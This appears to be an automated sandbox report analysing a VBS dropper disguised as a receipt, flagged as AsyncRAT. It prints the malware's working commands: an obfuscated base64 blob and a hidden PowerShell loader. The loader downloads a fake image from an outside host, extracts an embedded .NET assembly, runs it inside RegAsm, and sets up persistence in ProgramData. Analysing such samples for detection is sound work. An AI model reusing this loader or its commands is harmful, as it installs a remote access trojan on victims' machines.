TreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_01651300	10_2_01651300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_016539B1	10_2_016539B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_01653FA8	10_2_01653FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_01651878	10_2_01651878

Source: S847453-receipt.vbs

Initial sample: Strings found which are bigger than 50

Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2972228650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6276, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winVBS@14/14@5/4

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Pz7Nj[1].txt

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\5SZ3fDyURUpUFMlG

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgnitp0j.knq.ps1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S847453-receipt.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: S847453-receipt.vbs

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S847453-receipt.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'escudellar','RegAsm',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\escudellar.vbs"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\escudellar.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\escudellar.vbs"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\escudellar.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'escudellar','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\escudellar.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
